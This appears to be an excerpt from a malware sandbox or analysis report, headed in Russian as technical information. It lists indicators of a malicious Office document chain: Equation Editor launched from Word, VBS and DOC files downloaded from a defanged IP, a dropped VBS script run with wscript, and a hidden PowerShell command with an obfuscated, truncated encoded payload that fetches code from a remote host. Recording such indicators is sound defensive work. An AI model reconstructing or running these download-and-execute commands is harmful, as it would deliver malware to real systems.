Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\system32.vbs"
- %TEMP%\system32.vbs
- '19#.#.243.150':80
- 'cd#.#ixelbin.io':443
- http://19#.#.243.150/bbc/BBCGBBCGBBCGBBCGBBCGCBBCGBBCGBBCGBBCGBBCG%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23BBCGBBBCGBBCGBBBCGBBBCG.DOC
- http://19#.#.243.150/500/system_root.vbs
- 'cd#.#ixelbin.io':443
- DNS ASK cd#.#ixelbin.io
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBy⁂GU⁂Z⁂⁂t⁂Hc⁂aQBs⁂GQ⁂ZgBs⁂G8⁂dwBl⁂HI⁂LQ⁂x⁂GI⁂M⁂Bh⁂GY⁂N⁂⁂v⁂G8⁂cgBp⁂...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂HM⁂Og⁂v⁂C8⁂YwBk⁂G4⁂LgBw⁂Gk⁂e⁂Bl⁂Gw⁂YgBp⁂G4⁂LgBp⁂G8⁂LwB2⁂DI⁂LwBy⁂GU⁂Z⁂⁂t⁂Hc⁂aQBs⁂GQ⁂ZgBs⁂G8⁂dwBl⁂HI⁂LQ⁂x⁂GI⁂M⁂Bh⁂GY⁂N⁂⁂v⁂G8⁂cgBp⁂...